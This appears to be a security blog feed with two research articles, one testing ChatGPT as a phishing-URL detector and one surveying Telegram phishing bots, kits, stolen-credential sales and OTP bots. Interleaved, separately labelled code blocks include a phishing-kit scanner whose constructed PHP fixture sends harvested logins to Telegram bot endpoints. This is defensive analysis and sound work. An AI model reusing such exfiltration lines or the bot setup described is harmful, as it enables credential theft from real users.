  • The URL uses the term “Office365” which is a popular productivity suite, and it is a common target for phishing attacks. Cybercriminals often use this tactic to lure unsuspecting victims into clicking on a link and disclosing sensitive information.
  • The word “live” in the URL could be used to imply that the page is an official Microsoft Office365 login page, as Microsoft has used “live” in the past in some of its services.
  • The misspelling of “Office” as “0fflce” is another red flag as it is a common tactic used by phishers to trick users into believing the website is legitimate.
  • The “.php” extension at the end of the URL suggests that it is a PHP script running on a server, which is commonly used in phishing attacks to harvest login credentials.

Therefore, it is advisable to avoid clicking on such links and to always check the URL’s legitimacy before entering any personal information or credentials.

This is a pretty reasonable explanation. Aside from the fact that the model shows some distrust of PHP (well, who doesn’t?), it is good at recognizing the target organization and the homographic substitution (0fflce), and it even points out why “live” might have been used. This is an explanation worthy of a junior analyst.

To gather a corpus of explanations, we used the OpenAI API to query the model called GPT-3.5-turbo, which is the backend for ChatGPT. It is fast and cheap (we check a lot of links), but still powerful enough. For the test corpus, we gathered a few thousand links that our detection technologies deemed phishing, and threw in a few thousand safe URLs.

Attempt 1. Is it phishing?

ChatGPT is great at providing the answer in the form that you require – from poems:

And lastly, “0fflce” it doth spell amiss,

A trick oft used by phishers with a hiss.

Beware, dear user, and take great care,

Lest thou fall victim to this cyber snare.

to machine-readable formats. It can also do more than one thing at once. This means that in addition to the yes/no answer to the question about link safety, we could ask ChatGPT to format the response as JSON and also to include a rationale, as well as the possible target. So, after a few iterations, we settled on the following prompt:

messages = [
    {"role": "system", "content": "You are CyberGPT, a guru cyber security assistant AI."},
    {
        "role": "user",
        "content": 'Does this link lead to a phish website? Answer in the json format {"phish": "yes|no", "reasoning": "detailed explanation why", "target_company": "possible targeted company"}\nLink: ' + url
    }
]

We use a system prompt here (according to practitioners and docs, this is less important than the user input) that portrays ChatGPT as a cybersecurity chatbot and ask for its verdict in the user prompt. Frankly, the fact that it is so easy to get the desired output from ChatGPT is awe-inspiring.

It took us two nights to get about 6,000 verdicts (probably because we ran the experiment at the peak of all the hype), and once we got the data, we proceeded to parse the results.

Unfortunately, while most of the outputs could be parsed as is, some were corrupted: some contained additional text, such as “Note: be careful when opening links…” or just a dot at the end, others had unnecessary escape characters. All in all, less than 0.5% of JSONs were broken beyond automated fixes or contained text such as:

I am sorry, but as an AI language model, I am not able to access the internet or browse the website provided. However, as per the standard industry practices, you can check the legitimacy of the website by running it through a reputable online phishing detection service/provider. Additionally, if there are any official reports of phishing attacks or scams associated with the target company, it further increases the likelihood of the link leading to a phish website.

Which is still a reasonable answer.

All in all, after all the errors and rejections, we were left with a dataset of 2322 phish and 2943 safe URLs. The resulting metrics are:

  • Detection rate: 87.2%
  • False positive rate: 23.2%

While the detection rate is very high, the false positive rate is unacceptable. Imagine if every fifth website you visited were blocked. Sure, no machine learning technology on its own can have a zero false positive rate, but this number is too high. To put this in perspective, in the well-known URLNet paper, where Le et al. solved a very similar task, the authors achieved about the same detection rate (~85%) with a false positive rate of about 0.4% using a specially crafted convolutional neural network. The more recent URLTran paper by Maneriker et al. uses Transformers (the same architecture that powers ChatGPT) to achieve an even lower FPR.
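The collection and scoring loop described above, as an added example that is not part of the original article. The OpenAI call is replaced by a stand-in so the code runs offline: `fake_ask_model`, the `SAMPLES` URLs and the reply strings are constructed assumptions, written to imitate the output quirks the text reports (a trailing note, a stray dot, a refusal), and the parser shows the kind of repair that recovers most of them before a verdict is counted.

```python
"""Added example (not from the article): prompt building, verdict parsing and
DR/FPR scoring with the model call stubbed out.

Assumptions (not from the page): `fake_ask_model` stands in for an OpenAI chat
completion call, and SAMPLES are constructed replies, not real model output."""
import json
import re
from typing import Callable, Dict, List, Optional, Tuple

SYSTEM_PROMPT = "You are CyberGPT, a guru cyber security assistant AI."
USER_TEMPLATE = (
    'Does this link lead to a phish website? Answer in the json format '
    '{"phish": "yes|no", "reasoning": "detailed explanation why", '
    '"target_company": "possible targeted company"}\nLink: '
)


def build_messages(url: str) -> List[Dict[str, str]]:
    """Chat payload for the article's first prompt."""
    return [
        {"role": "system", "content": SYSTEM_PROMPT},
        {"role": "user", "content": USER_TEMPLATE + url},
    ]


# First {...} in the reply, greedy then lazy: the model sometimes wraps the
# JSON in notes or appends a dot, which json.loads alone rejects.
_GREEDY = re.compile(r"\{.*\}", re.DOTALL)
_LAZY = re.compile(r"\{.*?\}", re.DOTALL)


def parse_verdict(raw: str) -> Optional[Dict[str, str]]:
    """Recover the JSON verdict from a raw reply, or None for refusals and
    replies broken beyond these simple repairs (the caller counts those)."""
    candidates = []
    for rx in (_GREEDY, _LAZY):
        m = rx.search(raw)
        if m:
            text = m.group(0)
            # Undo the stray escape characters the model occasionally emits.
            candidates += [text, text.replace("\\_", "_").replace("\\'", "'")]
    for text in candidates:
        try:
            obj = json.loads(text)
        except json.JSONDecodeError:
            continue
        if isinstance(obj, dict) and str(obj.get("phish", "")).lower() in ("yes", "no"):
            obj["phish"] = str(obj["phish"]).lower()
            return obj
    return None


def score(samples: List[Tuple[str, bool]],
          ask_model: Callable[[List[Dict[str, str]]], str]) -> Dict[str, float]:
    """Query every (url, is_phish) pair and compute detection rate (share of
    phish flagged) and false positive rate (share of safe URLs flagged).
    Unparseable replies are dropped from both denominators, as in the text."""
    tp = fn = fp = tn = errors = 0
    for url, is_phish in samples:
        verdict = parse_verdict(ask_model(build_messages(url)))
        if verdict is None:
            errors += 1
            continue
        flagged = verdict["phish"] == "yes"
        if is_phish:
            tp += flagged
            fn += not flagged
        else:
            fp += flagged
            tn += not flagged
    return {
        "detection_rate": tp / (tp + fn) if tp + fn else 0.0,
        "false_positive_rate": fp / (fp + tn) if fp + tn else 0.0,
        "errors": errors,
    }


# Constructed (url, is_phish, reply) triples standing in for real traffic.
SAMPLES = [
    ("hxxp://phish-one.invalid/Office365/login.php", True,
     '{"phish": "yes", "reasoning": "brand in path, unrelated domain", "target_company": "Microsoft"}'),
    ("hxxp://phish-two.invalid/x", True,
     '{"phish": "Yes", "reasoning": "typo-squat", "target_company": "Steam"}.'),  # stray dot
    ("hxxp://phish-three.invalid/x", True,
     "I am sorry, but as an AI language model, I am not able to access the internet."),  # refusal
    ("https://safe-one.invalid/", False,
     '{"phish": "no", "reasoning": "known brand domain", "target_company": ""}\nNote: be careful when opening links.'),
    ("https://safe-two.invalid/", False,
     '{"phish": "yes", "reasoning": "unfamiliar domain", "target_company": ""}'),  # false positive
    ("https://safe-three.invalid/", False,
     '{"phish": "no", "reasoning": "looks fine", "target_company": ""}'),
]
_REPLIES = {url: reply for url, _, reply in SAMPLES}
LABELED = [(url, is_phish) for url, is_phish, _ in SAMPLES]


def fake_ask_model(messages: List[Dict[str, str]]) -> str:
    """Stand-in for the API call: looks the constructed reply up by URL."""
    url = messages[-1]["content"].rsplit("Link: ", 1)[1]
    return _REPLIES[url]


if __name__ == "__main__":
    print(score(LABELED, fake_ask_model))
```

On the constructed sample this yields a detection rate of 1.0, a false positive rate of one third and one dropped reply; the point is the separation between "model said no" and "model could not be parsed", which must not be merged if the FPR is to mean anything.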

ROC curve from Le et al., 2018, illustrating achievable TPR (DR)/FPR values

Unfortunately, there are no miracles here. This is also where we met the first limitation – we can’t adjust the threshold to trade FPR for DR. Or can we?

The second experiment: ‘Is it safe?’

Our prompt was probably too specific and cued the language model to view the link with suspicion. Instead of asking if the link is phishing, we could ask if it is safe to visit, and maybe the LLM would behave less suspiciously. This led us to the second prompt:

messages = [
    {"role": "system", "content": "You are a helpful internet security assistant chatbot."},
    {
        "role": "user",
        "content": 'Is this link safe to visit? '
        'Answer in the json format: {"safe": "yes|no", "yes_confidence": 0.5}'
        '\nwhere "yes_confidence" is the confidence that the link is safe from 0 to 1. '
        'Only output json.'
        '\nLink: ' + url
    },
]

Differences from the previous prompt:

  • Gone is the ‘cybersecurity guru’, who by nature should be suspicious of random links
  • We don’t ask for the target, so as not to alert the model that this is a phishing detection task
  • We do, however, ask for confidence. Though this is very unlikely, confidence may prove useful.

The results were quite discouraging:

  • Detection rate: 93.8%
  • False positive rate: 64.3%

It turns out that the more general prompt is more likely to prompt a verdict that the link is dangerous. This is how the links from the safe subset of data changed the assigned verdicts, compared to the previous cybersecurity guru prompt:

                                         Internet security assistant chatbot verdicts (safe data)
CyberGPT cybersecurity guru verdicts     safe      unsafe
safe                                     1049      1210
phish                                       2       682

Interestingly, the confidence choices are more like human-assigned confidence in the sense that round numbers like 90% occur most often:

TOP 5 probabilities that the model chose. Note that they are rounded to 0.1

At least the ROC curve looks alright, but there is no point at which this prompt would outperform the cybersecurity guru from the previous attempt:

ROC curve based on probabilities provided by ChatGPT

To conclude, it is hard to predict the behavior of the LLM based on human reasoning about the prompt. Probably the “safety” of a link is a vaguer concept than “phish”. Understanding why the first prompt won by a large margin is difficult, and choosing the best prompt at this time, despite the emergence of new prompt engineering techniques, is more art than science.
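The threshold trade-off that a yes/no prompt cannot offer but the confidence values from the second prompt can, as an added example that is not part of the original article: ROC points and the area under the curve computed from `yes_confidence` scores, with tied (rounded) scores moved as one step so the curve does not depend on the order URLs happen to be listed in. The scores, labels and function names are constructed assumptions, not the article's tooling.

```python
"""Added example (not from the article): ROC from rounded confidence scores.

`safe_conf[i]` is the model's confidence that URL i is safe; `labels[i]` is
True for phish. A URL is flagged as phish when safe_conf <= threshold, so a
higher threshold flags more URLs. Data below is constructed."""
from typing import List, Tuple

Point = Tuple[float, float, float]  # (threshold, fpr, tpr)


def roc_points(safe_conf: List[float], labels: List[bool]) -> List[Point]:
    """One point per distinct score: tied scores move together, which matters
    when the model only emits round numbers such as 0.9 or 0.8."""
    n_phish = sum(labels)
    n_safe = len(labels) - n_phish
    points: List[Point] = [(-1.0, 0.0, 0.0)]  # flag nothing
    for thr in sorted(set(safe_conf)):
        flagged = [lab for c, lab in zip(safe_conf, labels) if c <= thr]
        tp = sum(flagged)
        fp = len(flagged) - tp
        points.append((thr, fp / n_safe, tp / n_phish))
    return points


def auc(points: List[Point]) -> float:
    """Trapezoidal area under the (fpr, tpr) curve."""
    area = 0.0
    for (_, x0, y0), (_, x1, y1) in zip(points, points[1:]):
        area += (x1 - x0) * (y0 + y1) / 2
    return area


def best_operating_point(points: List[Point], max_fpr: float) -> Point:
    """Highest detection rate reachable without exceeding max_fpr: the knob
    the first prompt, with its bare yes/no output, does not expose."""
    allowed = [p for p in points if p[1] <= max_fpr]
    return max(allowed, key=lambda p: p[2])


# Constructed sample: rounded confidences (many ties); True = phish.
SAFE_CONF = [0.9, 0.9, 0.8, 0.5, 0.5, 0.3, 0.2, 0.9, 0.1, 0.1]
IS_PHISH = [False, False, False, False, True, True, True, True, True, True]

if __name__ == "__main__":
    pts = roc_points(SAFE_CONF, IS_PHISH)
    for thr, fpr, tpr in pts:
        print(f"thr<={thr:4.1f}  FPR={fpr:.2f}  DR={tpr:.2f}")
    print("AUC", round(auc(pts), 4), "best at FPR 0:", best_operating_point(pts, 0.0))
```

Because the scores cluster on a handful of round values, the curve has only a few usable operating points; a score that is rounded to 0.1 cannot be thresholded finer than that, which is why the article's ROC looks coarse.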

Verdict stability

An important fact about LLMs is that the generation process is random. You can coerce an LLM into being almost deterministic by setting its temperature parameter, which controls the output randomness, to 0 (numerical sources of non-determinism remain), but this usually hurts output quality (for example, the model tends to repeat the same phrase over and over again). In practice, therefore, sampling is used: for each token (a word or part of a word) that the network generates, there are a few alternative candidates to choose from (also controllable by parameters).

Non-deterministic verdicts are not the top feature you expect from a detection system. To measure its impact on the results, we conducted another small experiment in which we chose 200 random URLs (100 safe and 100 phish) and gathered verdicts with the same simplified prompt:

messages = [
    {"role": "system", "content": "You are a helpful internet security assistant chatbot."},
    {
        "role": "user",
        "content": 'Is this link safe to visit? '
        'Answer in the json format: {"safe": "yes|no"}'
        '\nOnly output json.'
        '\nLink: ' + url
    },
]

This is how the results of these two identical runs compare (the responses are not post-processed and answer the question of whether the link is safe):

               Run 2
Run 1      no    unknown    yes
no        145          2      3
yes         4          0     46

So, the verdict for 4.5% of the URLs changed due to the randomness of the LLM, with the variation in verdicts between runs on safe URLs being 7%. Again, while this can be remedied by tweaking the temperature, it’s an important factor to keep in mind when using LLMs.
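The run-to-run comparison above, as an added example that is not part of the original article: two verdict lists from otherwise identical runs are cross-tabulated, the share of flipped verdicts is reported overall and per class, and a majority vote over several samples is shown as a cheap stabiliser (my suggestion, not something the article tested). The verdict lists and labels are constructed.

```python
"""Added example (not from the article): verdict stability between runs.

Verdicts follow the article's second prompt: "yes" (safe), "no" (unsafe) or
"unknown" for an unparseable reply. All data below is constructed."""
from collections import Counter
from typing import Dict, List

Verdict = str


def run_agreement(run1: List[Verdict], run2: List[Verdict],
                  is_phish: List[bool]) -> Dict[str, object]:
    """Cross-tabulate run1 against run2 and report the share of URLs whose
    verdict changed, overall and separately for safe and phish URLs."""
    if not (len(run1) == len(run2) == len(is_phish)):
        raise ValueError("runs and labels must be the same length")
    crosstab = Counter(zip(run1, run2))
    changed_safe = sum(1 for a, b, p in zip(run1, run2, is_phish) if a != b and not p)
    changed_phish = sum(1 for a, b, p in zip(run1, run2, is_phish) if a != b and p)
    n_safe = is_phish.count(False)
    n_phish = is_phish.count(True)
    return {
        "crosstab": dict(crosstab),
        "flip_rate": (changed_safe + changed_phish) / len(run1),
        "flip_rate_safe": changed_safe / n_safe if n_safe else 0.0,
        "flip_rate_phish": changed_phish / n_phish if n_phish else 0.0,
    }


def majority_verdict(runs: List[List[Verdict]]) -> List[Verdict]:
    """Sample the model an odd number of times and keep the most common
    parseable verdict per URL; "unknown" only survives if nothing parsed."""
    out: List[Verdict] = []
    for votes in zip(*runs):
        counts = Counter(v for v in votes if v != "unknown")
        out.append(counts.most_common(1)[0][0] if counts else "unknown")
    return out


# Constructed data: 10 URLs, the first five safe, the last five phish.
IS_PHISH = [False] * 5 + [True] * 5
RUN1 = ["yes", "yes", "yes", "no", "yes", "no", "no", "no", "no", "no"]
RUN2 = ["yes", "no", "yes", "no", "yes", "no", "unknown", "no", "no", "yes"]
RUN3 = ["yes", "yes", "yes", "no", "yes", "no", "no", "no", "no", "no"]

if __name__ == "__main__":
    print(run_agreement(RUN1, RUN2, IS_PHISH))
    print(majority_verdict([RUN1, RUN2, RUN3]))
```

Tripling the number of API calls is the price of the vote; whether that is cheaper than lowering the temperature and living with the degraded output is a per-deployment decision.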

Organization extraction

The most striking aspect of ChatGPT’s performance was the extraction of the potential phishing target. When attackers craft their samples, they try to trick users into believing that the URL is genuine and belongs to a company, while also obfuscating it enough to fool automated analysis. Extracting the attack target can be useful in many scenarios.

ChatGPT has enough real-world knowledge to know about many internet and financial services and with only a small post-processing step (e.g., merging “Apple” and “iCloud” or removing “LLC” and “Inc”) it does a very good job at extracting them. It was able to identify a target more than half the time. Note that not every URL contains a reference to a target organization. Among the identified companies, there were major tech portals like Facebook, TikTok and Google, marketplaces such as Amazon and Steam, lots of banks from all over the world, from Australia to Russia, cryptocurrency and delivery services.

Some interesting examples include:

URL: hxxps://steancxxxmuunity.com/profiles/765xxxxxxxxxx175

Organization: Steam

Reasoning: The domain name ‘steancxxxmuunity.com’ appears to be a typo-squatting attempt. The correct spelling of the domain should be ‘steamcommunity.com’. The website is trying to impersonate Steam Community, a popular gaming platform…

URL: https://cxxxxxxxxr.com/wp-includes/js/jcrop/cgi/BOfA/Validation/login.php?cmd=login_submit

Organization: Bank of America

Reasoning: The link is suspicious and indicates a phishing attempt because the domain name is not related to the possible targeted company (Bank of America), the URL is also suspicious containing additional characters such as ‘/wp-includes/js/jcrop/cgi’…

URL: http://caseld-10xxxx.info/1/Office365/0fflce3.6.5/live/login.php

Organization: Microsoft

Reasoning: The link’s domain name (caseld-10xx93.info) does not appear to be related to Microsoft’s Office 365 service. The URL path also contains a misspelled version of the word ‘office’ (0fflce) and a suspiciously old version number (3.6.5).

URL: http://adobexxxsignxxxx.duckdns.org/ees/

Organization: Adobe

Reasoning: The domain name ‘duckdns.org’ is a free dynamic DNS provider which is often used by cyber criminals for hosting phishing sites or other malicious content. Additionally, the subdomain adobexxxsignxxxx in the URL appears to imitate the legitimate Adobe service ‘Adobe Sign’, which suggests that the attackers may be targeting Adobe’s customers for information theft or fraud.

Here we see that ChatGPT detects homographic attacks (although it can confuse them with typo-squatting), and correctly states that the domains are not related to the companies. While it fails to untangle that “3.6.5” is an imitation of 365, the explanations are quite reasonable.

Implicit knowledge: reasoning analysis

The examples above are cherry-picked. When cherry-picking with the opposite intention, some funny things happen. The explanations that ChatGPT provides may include:

  • References to WHOIS, which the model doesn’t have access to:
    • Finally, if we perform a WHOIS lookup for the domain name, it was registered very recently (2020-10-14) and the registrant details are hidden.
  • References to content on a website that the model doesn’t have access to either:
    • the website is asking for user credentials on a non-Microsoft website. This is a common tactic for phishing attacks.
    • Additionally, the webpage’s layout and design are inconsistent with eBay’s official website, indicating that it may be a fake website designed to impersonate eBay.
    • There is also no information available on the website’s security and privacy policy. A secure website should provide that information transparently to users.
  • References to SSL certificate expiration:
    • The domain ‘duckdns.org’ is not owned by Netflix, and the SSL Certificate is invalid.
  • Misstatements:
    • The domain ‘sxxxxxxp.com’ is not associated with Netflix and the website uses ‘http’ protocol instead of ‘https’ (the website uses https)
  • Revelatory nuggets of cybersecurity information:
    • The domain name for the URL ‘yxxxx3.com’ appears to be registered in Korea which is a red-flag.

These are funny and highlight the limitations of an LLM: while it can generate reasonable explanations, it is also prone to hallucinations – such as imagining contexts that it does not have access to, or coming up with facts that are just plain wrong.

In general, however, we see that the model demonstrates a non-trivial understanding of the task. Analyzing all the explanations by hand would be laborious, so we do some distant reading here to get a bird’s-eye overview of the reasonings it generates by applying a little bit of old-school NLP.

First of all, we noticed that the model used mostly short, terse sentences with one point per sentence in its explanations. We split the statements into sentences using the NLTK Punkt tokenizer. The resulting sentences were then vectorized using MPNet from the Sentence-BERT (sentence-transformers) package, and then visualized using UMAP. To color the resulting plot, we used DBSCAN clustering. A few iterations of hyperparameter tweaking yielded the following result:

Cluster analysis of explanations provided by ChatGPT. Semantically close reasons form dense clusters.

These dense clusters reveal the most popular phrases that the model provides as explanations. Some of these clusters are:

  • Mentions of particular target companies.
  • Recommendations not to click the link.
  • Certain statements about the website being phish or not.
  • Statements of uncertainty.
  • References to HTTPS (or lack thereof) or SSL (usually hallucinations).
  • Sentences like “This is a common tactic…”

However, some of them reveal “common tactics”:

  • Use of IPFS: “The URL looks suspicious and appears to be hosted on IPFS which can be used to host malicious content.”
  • Suspicious elements in path, including homographic attacks: “This link is an example of a homograph attack also known as ‘IDN homograph attack’.”
  • Elements in path or domain that are related to security and urgency: “Lastly, the URL has a sense of urgency to it, indicating that the user needs to click immediately.”
  • Use of dynamic DNS: “The domain name ‘duckdns.org’ is a free dynamic DNS provider that can be used by anyone to create custom subdomains, which makes it easy for attackers to use for phishing emails or websites impersonating legitimate companies”.
  • An email in the parameters: “Additionally, the email address used as a query parameter may indicate a potential phishing attempt.”
  • Mention of an organization in the path or subdomain while the domain is not related to the organization: “The link appears suspicious as it contains a subdomain that is not related to Amazon.”
  • Elements in the domain that look autogenerated: “Also, the path ‘bafyxxxxxxxxxxxxxxxxxx43ky’ suggests that this is an autogenerated link.”

These points make a lot of sense. This means that the training data for ChatGPT contained enough cybersecurity material for the LLM to learn the telltale signs of phishing attempts and use this knowledge to analyze specific cases, which is very impressive.

Conclusion

As we have seen, for a zero-shot system the results are amazing – it is hard to argue with, even for a die-hard sceptic. Anecdotal examples, especially the cherry-picked ones, are also very impressive. This is why, when we talk about real-world performance, a screenshot from Twitter is not a solid basis for decision-making. This is especially true in cybersecurity, where applying automated scenarios to our tasks means going far beyond “good” or even “impressive” performance.

As with many other use cases, the core detection task is only part of the problem. Creating signatures or blocklist records, validating and testing them, delivering them, ensuring quality of service is less glamorous, but just as important, and here we need a lot of hard work done by humans to get things rolling.

Moreover, the use of LLMs means applying a whole new set of skills. We could have improved the results, in detection, target organization extraction and reasoning alike, by trying various things:

  • Using a stronger model, such as GPT-4
  • Using special prompt-designing patterns, such as Chain-of-Thought-prompting or Reflect-Critique-Improve
  • Feeding parts of the HTML along with the URL
  • Adjusting the system prompt and sampling parameters, such as temperature, etc.

However, this means abandoning the hope of a zero-shot AI that “just works”. Also, using LLMs means dealing with their current idiosyncrasies, such as the demonstrated tendency to hallucinate (manifested by coming up with imaginary explanations and referring to page texts it has never seen), randomness of output, as well as possible prompt injection attacks.

On the other hand, if we look at the organization extraction and reasoning, we have to admit that it performs on par with what we would expect from an intern-level phishing analyst: it is good, but never leave it without supervision! Therefore, it is possible to use this type of technology to assist flesh-and-blood analysts by highlighting suspicious parts of the URL and suggesting possible attack targets. It could also be used in weak supervision pipelines to improve classic ML pipelines.

All in all, while impressive, ChatGPT and LLMs are not yet ready to radically change the cybersecurity game, at least as far as phishing detection is concerned. At Kaspersky, we continue to investigate cutting-edge technologies and study their potential impact on both cyberattackers and defenders. Let’s see what happens next.

The Telegram phishing market
https://securelist.com/telegram-phishing-services/109383/
Wed, 05 Apr 2023 10:00:17 +0000

Telegram has been gaining popularity with users around the world year by year. Common users are not the only ones who have recognized the messaging app’s handy features — cybercrooks have already made it a branch of the dark web, their Telegram activity soaring since late 2021.

The service is especially popular with phishers. They have become adept at using Telegram both for automating their activities and for providing various services — from selling phishing kits to helping with setting up custom phishing campaigns — to all willing to pay.

To promote their “goods”, phishers create Telegram channels through which they educate their audience about phishing and entertain subscribers with polls like, “What type of personal data do you prefer?”. Links to the channels are spread via YouTube, GitHub and phishing kits they make.

This story covers the variety of phishing services available on Telegram, their details and pricing, and ways of detecting phishing content that originates in Telegram.

The Telegram black market: what’s on offer

After reviewing phishers’ Telegram channels that we detected, we broke down the services they promoted into paid and free.

Free content for aspiring phishers

Automated phishing with Telegram bots

Functional and configurable, Telegram bots help private users and businesses with automating many routine workflows, such as searching for and retrieving information on schedule, answering frequently asked questions from customers, setting up reminders and many others. Malicious actors use Telegram bots to automate illegal activities, such as generating phishing pages or collecting user data.

The process of creating a fake website with a Telegram bot typically includes the following steps:

  1. The wannabe phisher joins the bot creator’s channel.

  2. As a rule, the bot offers to select a language once started. In the example below, the bot speaks English and Arabic.

    Starting a Telegram phishing bot

  3. The bot prompts the user to create a new bot of their own and share its token with the main bot. The purpose of this second bot is to capture the data of users who follow the phishing links and attempt to log in to the fake website. Setting up that new bot on Telegram is the budding scammer’s job, but that process is also automated and no rocket science.

    Phishing bot asking the user to set up a new bot and share the token

  4. Once the user feeds the token to the first bot, it generates a series of links to fake websites hosted in the same domain. The sites may mimic various services: PUBG, Facebook, PayPal and so on.

    List of off-the-shelf pages in the same domain

Distributing the links is something the wannabe phisher has to do without any help from the bot. If a visitor enters their credentials on the fake page, a notification will be sent to the chat with the bot that our beginning scammer created while generating links to the fake page. The notification will typically contain the phishing link, the victim’s credentials, the name of the country that they logged in from, the country code and the IP address of the device that was used.

Message with the stolen data received by the phisher

Bots that generate phishing pages may differ slightly. For instance, before generating phishing links, one particular bot offers to select a service to mimic and enter a URL the victim will be redirected to after trying to log in. The latter is typically the Google home page or the main page of the service that the phishing page imitates. Once a URL is entered, the bot will generate several scam links targeting users of the service. In this case, victims’ credentials will be sent directly to the phishing bot.

List of services suggested by the bot

What are these fake pages that are so easy to generate? A victim who clicks a link in a message that promises, say, 1,000 likes in TikTok will be presented with a login form that looks like the real thing. The page typically contains nothing besides that form. We filled in the login and password fields in the screenshot below.

Fake TikTok login page generated by the phishing bot

From an engineering standpoint, this is a rather primitive product of a basic phishing kit. When a scammer requests a phishing page from a Telegram bot, it forwards the request along with all required data to a utility that assembles pages from predefined packages and returns hyperlinks. To forward the stolen data to the bot, phishing kits include a script into which the token of the bot that receives user credentials, Telegram bot chat identifier and a URL to redirect the user after entering their credentials will be inserted. Some scripts may lack the URL field.

Script to configure stolen data forwarding to the Telegram bot

By the way, there is no reason why the developer of a phishing kit cannot configure it to grab a copy of the data obtained by the unsuspecting newbie phisher.
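A check an analyst can run on a kit like the one just described, as an added example that is neither the kit's code nor Kaspersky's tooling: it pulls Telegram bot tokens, chat identifiers and Bot API calls out of kit source and flags a second recipient, which is exactly the "copy for the kit author" case mentioned above. The token and chat_id patterns follow the public Telegram Bot API formats; the PHP snippet is constructed for the demo and is not a working kit.

```python
"""Added example (not from the article or any kit): find Telegram
exfiltration settings in phishing-kit source and spot a second recipient.

Assumptions: bot tokens are <8-10 digit bot id>:<35-char secret> and chat ids
are integers (the Bot API formats); KIT_FILES is a constructed snippet."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Token must not be glued to more digits on the left, nor continue on the right.
TOKEN_RE = re.compile(r"(?<!\d)(\d{8,10}:[A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")
# chat_id assigned or passed in PHP/JS/JSON-ish source: $chat_id = '123'; chat_id=123
CHAT_ID_RE = re.compile(r"chat_?id\W{0,6}(-?\d{5,})", re.IGNORECASE)
API_RE = re.compile(r"api\.telegram\.org/bot")


@dataclass
class ExfilReport:
    tokens: List[str] = field(default_factory=list)
    chat_ids: List[str] = field(default_factory=list)
    uses_bot_api: bool = False

    @property
    def suspicious_double_exfil(self) -> bool:
        # A kit configured by one operator carries one token and one chat;
        # a second pair usually means someone else also receives the data.
        return len(self.tokens) > 1 or len(self.chat_ids) > 1


def scan_source(files: Dict[str, str]) -> ExfilReport:
    """Scan {filename: source} and collect distinct Telegram destinations."""
    report = ExfilReport()
    for src in files.values():
        for tok in TOKEN_RE.findall(src):
            if tok not in report.tokens:
                report.tokens.append(tok)
        for cid in CHAT_ID_RE.findall(src):
            if cid not in report.chat_ids:
                report.chat_ids.append(cid)
        if API_RE.search(src):
            report.uses_bot_api = True
    return report


# Constructed sample (not a real kit): the operator's token and chat id are
# configurable, and a second hard-coded destination is left in by the author.
KIT_FILES = {
    "send.php": (
        "<?php\n"
        "$token = '1234567890:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi';\n"
        "$chat_id = '987654321';\n"
        "$msg = 'Login: '.$_POST['email'].' IP: '.$_SERVER['REMOTE_ADDR'];\n"
        "@file_get_contents(\"https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=\".urlencode($msg));\n"
        "// 'support' copy\n"
        "@file_get_contents('https://api.telegram.org/bot1122334455:zyxwvutsrqponmlkjihgfedcbaZYXWVUTSR/sendMessage?chat_id=555000111&text='.urlencode($msg));\n"
        "header('Location: https://www.example.com/');\n"
    ),
}

if __name__ == "__main__":
    rep = scan_source(KIT_FILES)
    print(rep)
    print("double exfil:", rep.suspicious_double_exfil)
```

Any token recovered this way is also a lead for takedown: the bot id in front of the colon identifies the receiving bot, and the Bot API's getMe/getUpdates endpoints will tell an incident responder whether it is still live.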

Free phishing kits and users’ personal data

Scammer-operated Telegram channels sometimes post what appears to be exceptionally generous offers, for example, zipped up sets of ready-to-use phishing kits that target a large number of global and local brands.

Archive with phishing kits posted in a Telegram scam channel

Contents of a free phishing kit archive

Phishers also share stolen personal data with their subscribers, tagging it with information on whether it was verified or not. “Yellow light data” in the screenshot below stands for “unknown data quality”. This is probably an allusion to the yellow traffic light.

Files containing free credentials of US and Russian users

Why would scammers so generously share valuable data with others instead of using it for their own benefit? One reason is that any free content or manuals so willingly distributed by scammers to their Telegram audience serve as bait of sorts for less experienced phishers to bite. Newbies get a taste of what phishing tools can do, pull off their first scam and wish for more, which is when they will be offered paid content.

Another reason is recruiting an unpaid workforce. As mentioned above, the creators of phishing bots and kits can get access to data collected with tools they made. To attract larger audiences, scam operators advertise their services, promising to teach others how to phish for serious cash.

Ad for a Telegram channel offering phishing content

Besides free phishing kits and bot-powered scams, Telegram fraudsters offer paid phishing pages and data, as well as phishing-as-a-service (PhaaS) subscriptions. The service may include access to phishing tools, as well as guides for beginners and technical support.

Malicious actors offer “premium” phishing and scam pages for sale. Unlike the primitive copies of popular websites, these offers include pages built from scratch with a range of advanced capabilities or tools for generating such pages. For instance, a “premium” page may include elements of social engineering, such as an appealing design, promises of large earnings, an anti-detection system and so on.

Scam pages offered for sale in Telegram

In the screenshot below, the seller promises that each of their “projects” has an anti-bot system, URL encryption, geoblocking and other features that attackers will find useful. The seller goes on to offer custom phishing pages that can include any components requested by the customer.

The seller's description of advanced phishing page functionalities

After looking closer at these offers, we found that they do contain scripts to block web crawlers and anti-phishing technology. Therefore, these projects are essentially complex or advanced phishing kits.

Contents of a phishing kit archive with an anti-bot system

“Premium page” vendors update their anti-bot systems regularly so that the phishing content remains undetected and thus usable.

Phishing page vendor announcing the anti-bot system has been updated

Prices for this kind of fake pages differ, with some vendors asking $10 per copy, and others charging $50 for an archive with several pages in it. A package that includes less frequently offered features, for example, 3-D Secure support, and assistance with configuring a fake website, may cost up to $300.

Scam page with 3-D Secure support offered for $280

User personal data for sale

Online banking credentials obtained through phishing techniques are often offered for sale too. Unlike the free data mentioned above, these have been checked, and even the account balances have been extracted. The higher the balance, the more money scammers will typically charge for the credentials.

For example, the same Telegram channel offered the credentials for a bank account with $1,400 in it for $110, whereas access to an account with a balance of $49,000 was put up for $700.

Offer of credentials for an account with a balance of $1,400

Offer of credentials for an account with a balance of $49,000

Phishing-as-a-Service

In addition to one-time sales of phishing kits and user data, scammers use Telegram channels to sell a range of subscriptions with customer support included. Support includes providing updates on a regular basis for the phishing tools, anti-detection systems and links generated by the phishing kits.

An OTP (one-time password) bot is another service available by subscription. Legitimate services use one-time passwords as a second authentication factor. Many organizations enforce a two-factor authentication (2FA) requirement these days, which makes it impossible to hijack an account with just the login and password. Phishers use OTP bots to try and hack 2FA.

The bots call users, posing as the organization maintaining the account that the phishers are trying to hack, and convince them to enter a 2FA code on their phones. The calls are fully automated. The bot then enters the code in a required field, giving the phisher access to the account.

List of OTP bot features and benefits

According to a bot vendor we talked to, a weekly subscription with unlimited calls will set a beginning scammer back $130, while a monthly subscription including bot customization costs as much as $500.

